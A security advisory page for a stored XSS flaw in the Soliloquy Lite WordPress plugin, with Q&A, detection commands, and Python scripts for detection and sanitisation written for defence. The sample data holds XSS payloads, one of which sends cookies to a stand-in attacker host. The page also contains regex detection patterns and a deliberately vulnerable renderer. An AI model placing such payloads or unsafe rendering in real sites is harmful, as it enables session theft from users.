CVE-2019-25743
Persistent XSS in WordPress Soliloquy Lite Plugin
Publication date: 2026-06-04
Last updated on: 2026-06-04
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| soliloquy | soliloquy_lite | 2.5.6 |
| soliloquywp | soliloquy_lite | 2.5.6 |
| soliloquywp | soliloquy_lite | up to 2.5.6 (excluding 2.5.6) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify any direct impact of the WordPress Soliloquy Lite 2.5.6 persistent cross-site scripting vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
CVE-2019-25743 is a persistent (stored) cross-site scripting vulnerability in WordPress Soliloquy Lite version 2.5.6. An authenticated attacker injects script by placing script tags in the post title field: a POST request to the post editing endpoint carries the payload in the post_title parameter, the plugin stores it without neutralizing it, and the script runs in the browser of any user who later previews the affected post.
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to run script in the context of your website whenever a user previews an affected post. That can lead to theft of session data, defacement of content, or actions performed on behalf of the viewing user without their consent. Because the attack requires authentication but not administrative rights, a user with limited privileges who can create or edit posts could use it to target a higher-privileged user, such as an administrator previewing the post, and so escalate their impact.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Exposure is determined by the installed plugin version: any site running Soliloquy Lite 2.5.6 or earlier is affected (check the Plugins page, or run wp plugin list with WP-CLI). Whether it has actually been exploited is checked by looking for script content in post titles, since that is where the payload is stored.
One approach is to inspect POST requests to the post editing endpoint for script payloads in the post_title parameter. A standard web-server access log records only the request line, not the POST body, so post_title will not appear in it; this check needs a source that captures request bodies, such as a WAF or ModSecurity audit log, and the payload will normally arrive URL-encoded (%3Cscript rather than <script).
A sample command against such a log, matching both the encoded and the decoded form:
- grep -iE 'post_title=[^& ]*(<script|%3Cscript)' /path/to/audit.log
Additionally, within WordPress, you can audit stored titles with a database query. Match on the opening of the tag rather than the literal <script> so that variants such as <script src=...> are caught, extend the OR list with any other event handlers or URI schemes you want to cover, and adjust the wp_ prefix if your tables use a different one:
- SELECT ID, post_title FROM wp_posts WHERE post_title LIKE '%<script%' OR post_title LIKE '%javascript:%' OR post_title LIKE '%onerror=%';
A hit from either check shows that a payload was submitted via the vulnerable parameter; a clean result does not show that the plugin is patched, so verify the version regardless.
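The following Python script is an added worked example, not code from this page or from the Soliloquy project. It applies the two checks above to constructed data: an in-memory SQLite stand-in for wp_posts shows what a LIKE query does and does not match, a regex heuristic also catches <script src=...>, inline event handlers and javascript: URIs, and a scan of constructed WAF-style log lines (whose last field is the URL-encoded POST body, which a stock access log never records) pulls out suspicious post_title submissions. The endpoint path, the log layout, the sample titles and the regex itself are assumptions made for the example.

```python
import re
import sqlite3
from html import unescape
from urllib.parse import unquote_plus

# Heuristic for script content in a field that should be plain text. Wider than
# the literal '<script>' so that <script src=...>, <SCRIPT>, inline event
# handlers and javascript: URIs are also reported. The pattern is an assumption
# chosen for this example, not a signature taken from the advisory.
XSS_PATTERN = re.compile(
    r"<\s*script\b"                               # <script ...>, any case
    r"|javascript\s*:"                            # javascript: URIs
    r"|<[^>]*\son[a-z]+\s*="                      # onerror=, onload=, ... inside a tag
    r"|<\s*(?:img|svg|iframe|object|embed)\b",    # common tag-based vectors
    re.IGNORECASE,
)

def normalise(value: str) -> str:
    """Undo one layer of URL encoding and one of HTML entity encoding so a payload
    sent as %3Cscript%3E or &lt;script&gt; is matched in its decoded form."""
    return unescape(unquote_plus(value))

def looks_like_xss(value: str) -> bool:
    return bool(XSS_PATTERN.search(normalise(value)))

def sql_scan(rows, like_pattern):
    """Run a LIKE-style query against an in-memory copy of wp_posts (sqlite3
    stands in for MySQL; both treat ASCII LIKE case-insensitively by default)
    and return the matching IDs in ID order."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT)")
    con.executemany("INSERT INTO wp_posts VALUES (?, ?)", rows)
    ids = [r[0] for r in con.execute(
        "SELECT ID FROM wp_posts WHERE post_title LIKE ? ORDER BY ID", (like_pattern,))]
    con.close()
    return ids

def flag_post_titles(rows):
    """rows: (ID, post_title) pairs as returned by SELECT ID, post_title FROM wp_posts.
    Returns the IDs whose title trips the regex heuristic."""
    return [post_id for post_id, title in rows if looks_like_xss(title)]

def flag_request_bodies(log_lines):
    """log_lines: request records whose last space-separated field is the raw
    URL-encoded POST body (an audit-log layout constructed for this example).
    Returns (line_number, decoded post_title) for each suspicious submission."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        body = line.rstrip("\n").rsplit(" ", 1)[-1]
        for pair in body.split("&"):
            key, _, raw_value = pair.partition("=")
            if key == "post_title" and looks_like_xss(raw_value):
                hits.append((lineno, normalise(raw_value)))
    return hits

# Constructed sample data (not real posts or traffic).
SAMPLE_ROWS = [
    (101, "Spring Slider Showcase"),
    (102, "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
    (103, "<SCRIPT src=//attacker.example/x.js></SCRIPT>"),
    (104, '<img src=x onerror="alert(1)">'),
    (105, "Terms &amp; Conditions"),
]
SAMPLE_LOG = [
    '10.0.0.5 - editor [04/Jun/2026:10:01:02 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 '
    'post_title=Spring+Slider&content=hello',
    '10.0.0.9 - contributor [04/Jun/2026:10:03:44 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 '
    'post_title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&content=x',
    '10.0.0.9 - contributor [04/Jun/2026:10:04:10 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 '
    'post_title=%3CIMG+SRC%3Dx+onerror%3Dalert%281%29%3E',
]

if __name__ == "__main__":
    print("LIKE '%<script>%' :", sql_scan(SAMPLE_ROWS, "%<script>%"))   # [102]: misses 103 and 104
    print("LIKE '%<script%'  :", sql_scan(SAMPLE_ROWS, "%<script%"))    # [102, 103]: still misses 104
    print("regex heuristic   :", flag_post_titles(SAMPLE_ROWS))          # [102, 103, 104]
    for lineno, title in flag_request_bodies(SAMPLE_LOG):
        print(f"log line {lineno}: post_title={title!r}")
```

The point of running both queries is visible in the output: the literal '%<script>%' finds only the textbook payload, the looser '%<script%' picks up the external-script variant, and neither sees the image-with-handler title. Treat every regex hit as a candidate for manual review rather than proof of compromise, since the heuristic will also fire on legitimate titles that happen to mention these strings.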
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately update the Soliloquy Lite plugin to a version later than 2.5.6 where the issue is fixed.
If an update is not immediately possible, reduce who can reach the post editing endpoint: the attack requires an authenticated account that can create or edit posts, not an administrator, so audit the accounts holding those rights (Contributor role and above), remove or suspend any that are not trusted, and treat every such account as a possible source of the payload.
Additionally, review and sanitize post titles to remove any injected script tags or suspicious content.
Consider disabling the preview functionality temporarily to prevent execution of stored malicious scripts.
Monitor logs for suspicious POST requests containing script tags in the post_title parameter and remove any malicious posts found.
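The review-and-sanitize step above, as an added example written in Python rather than the plugin's PHP: this is not Soliloquy's or WordPress's code, and the sanitizer matches the intent of sanitize_text_field without reproducing its exact behaviour. It puts a deliberately vulnerable title renderer beside a hardened one that strips all markup from the title, drops the bodies of script and style elements, and HTML-escapes the result at output time, then lists which stored rows would change so they can be reviewed before any UPDATE. Function names, the h1 markup and the sample rows are assumptions.

```python
import html
from html.parser import HTMLParser

def render_title_unsafe(title: str) -> str:
    """Vulnerable pattern: the stored title is dropped straight into markup, so a
    title of '<script>...</script>' runs in the browser of whoever views it."""
    return f"<h1 class='post-title'>{title}</h1>"

class _TitleCleaner(HTMLParser):
    """Collects text nodes only; tags are discarded and the bodies of <script>
    and <style> elements are dropped rather than kept as text."""
    _SKIP = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self._skipping = 0

    def handle_starttag(self, tag, attrs):
        if tag in self._SKIP:
            self._skipping += 1

    def handle_endtag(self, tag):
        if tag in self._SKIP and self._skipping:
            self._skipping -= 1

    def handle_data(self, data):
        if not self._skipping:
            self.parts.append(data)

def sanitize_title(title: str) -> str:
    """Reduce a title to plain text: no tags, no script/style bodies, entities
    decoded, whitespace collapsed. Same intent as WordPress's sanitize_text_field,
    but an independent implementation written for this example."""
    cleaner = _TitleCleaner()
    cleaner.feed(title)
    cleaner.close()
    return " ".join("".join(cleaner.parts).split())

def render_title_safe(title: str) -> str:
    """Hardened pattern: sanitise on the way in and HTML-escape on the way out.
    Escaping alone already stops script execution; stripping as well keeps the
    stored value clean for other consumers (feeds, admin lists, previews)."""
    return f"<h1 class='post-title'>{html.escape(sanitize_title(title))}</h1>"

def clean_rows(rows):
    """For (ID, post_title) rows flagged during detection, return (ID, original,
    cleaned) for every row whose title would change, ready for manual review
    before an UPDATE is issued."""
    changes = []
    for post_id, title in rows:
        cleaned = sanitize_title(title)
        if cleaned != title:
            changes.append((post_id, title, cleaned))
    return changes

# Constructed examples; row 102 carries the kind of payload the advisory describes.
SAMPLE_ROWS = [
    (101, "Spring Slider Showcase"),
    (102, "<script>alert(document.domain)</script>Summer Slider"),
    (103, '<img src=x onerror="alert(1)">'),
    (104, "Terms & Conditions"),
]

if __name__ == "__main__":
    for post_id, title in SAMPLE_ROWS:
        print(post_id, "unsafe:", render_title_unsafe(title))
        print(post_id, "safe:  ", render_title_safe(title))
    for post_id, before, after in clean_rows(SAMPLE_ROWS):
        print(f"post {post_id}: {before!r} -> {after!r}")
```

Row 103 sanitizes to an empty string, which is the right outcome for a title that was nothing but a payload, but it also means the cleanup must be reviewed by a person rather than applied blindly: a legitimate title can carry an ampersand or an angle bracket and should be escaped at output, not deleted.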